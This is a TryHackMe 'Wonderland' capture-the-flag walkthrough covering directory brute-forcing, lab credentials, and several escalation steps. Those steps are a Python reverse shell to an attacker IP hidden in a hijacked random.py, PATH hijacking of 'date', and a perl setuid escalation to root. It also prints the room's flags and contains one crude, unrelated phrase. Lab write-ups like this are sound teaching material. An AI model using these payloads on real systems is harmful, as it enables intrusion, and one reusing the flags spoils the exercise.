In this walk through, we will be going through the Wonderland from Tryhackme. This room is rated as Medium on the platform and the objective is to grab two flags from the machine by showcasing skills in Enumeration, Exploitation and horizontal & vertical Privilege Escalation. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Wonderland |
IPaddress | 10.10.15.200 |
Difficulty | Medium |
Objective | Enter Wonderland and capture the flags. |
Enumeration:
- Checking if machine is live or not
- I perfomed a Nmap scan and got port 22 and 80 opened.
sudo nmap -sS -sV 10.10.15.200
- Next, i started enumerating port 80 which was running a Golang web server.
- Fired gobuster to reveal some hidden directories. Find one – /r
wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.15.200/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/03/17 20:15:31 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 0] [--> img/] /index.html (Status: 301) [Size: 0] [--> ./] /r (Status: 301) [Size: 0] [--> r
- Navigating to the /r, we got the message to “Keep Going“. I again fire up the gobuster on the existing URL.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.15.200/r/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/03/17 20:17:56 Starting gobuster in directory enumeration mode =============================================================== /a (Status: 301) [Size: 0] [--> a/] /index.html (Status: 301) [Size: 0] [--> ./] =============================================================== 2023/03/17 20:19:40 Finished ===============================================================
wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/a/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.15.200/r/a/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/03/17 20:19:49 Starting gobuster in directory enumeration mode =============================================================== /b (Status: 301) [Size: 0] [--> b/] /index.html (Status: 301) [Size: 0] [--> ./] =============================================================== 2023/03/17 20:21:29 Finished ===============================================================
- This seems like, we are completing the word “Rabbit” in the directory search.
- Finally completed it – http://10.10.15.200/r/a/b/b/i/t/
- Checking the page source code using Ctrl+U got a potential user-password combination – alice:HowDothTheLittleCrocodileImproveHisShiningTail
Initial Access:
- Used the creds to log into the machine using SSH.
- Everything is upside down. Getting the user flag in the root directory.
- Next we checked what elevated commands we can run using sudo -l. We can’t find anything on us however we found that the walrus_and_the_carpenter.py can be run by the user – rabbit.
- Upon checking the content of the walrus_and_the_carpenter.py, we found out that it is using the random module.
Privilege Escalation:
- I came accross the Path hijacking vulnerability in python where we can hijack a path of the module if we have a write permission. So, next we make a file named with random.py which will trigger our code and provide us the shell of the user.
import os import pty import socket lhost = "10.18.11.103" lport = 4444 ZIP_DEFLATED = 0 class ZipFile: def close(*args): return def write(*args): return def __init__(self, *args): return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
- Viewing the contents of the teaParty. we found a string where the script is querying the date binary, which we can exploit using PATH manipulation.
- I tried to make a file named “date” and spawn a shell using it but i was unable to do so, neither using nano nor vim. So i made the file in my local machine and then transferred it using wget.
chmod +x date echo $PATH export PATH=/home/rabbit:$PATH echo $PATH ./teaParty
- Next we found a password.txt file in the user hatter directory. I found a password in it. I downloaded linpeas in the machine to enumerate for priv esc vectors however it got stuck in the date section. So, i tried the new password to SSH into the user hatter and got the success. Meanwhile i re-spwan the rabbit shell and delete the date file we made earlier to avoid the conflict while using linpeas.
- hatter SSH password – WhyIsARavenLikeAWritingDesk?
- In the linpeas results, we find that we have a capability set to a perl file. We can use it as a backdoor to escalate our privileges by manipulating its process UID
cp $(which perl) . /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
- With this, we successfully rooted this box and got our root flag as a sign of victory.
Task 1 – Capture the flags
Question 1 – Obtain the flag in user.txt
thm{"Curiouser and curiouser!"}
Question 2 – Escalate your privileges, what is the flag in root.txt?
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
Also Read: Tryhackme – Windows PrivEsc
Conclusion:
So that was “Wonderland” for you. We started off with a regular nmap scan and found two ports opened – 80 (HTTP) and 22 (SSH). Next, performed directory bruteforcing with gobuster and found directory pattern of r/a/b/b/i/t. Moving on, found the credentials of alice in Page source code and got our initial access via SSH. Once inside, got the user flag in the root directory. In the alice directory, we found a python script utilizing the random module. Used path hijacking to get a shell of the user rabbit. Then, performed path manipulation on date binary to get access to user hatter. Found SSH password of hatter in his home directory and using that logged into his account. At last, used Linpeas to find potential Priv esc vectors and found that perl had a capabilities set. With the help of that, escalated our privileges to root and got the root flag in the root directory along side the tampon of Lord Putin. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.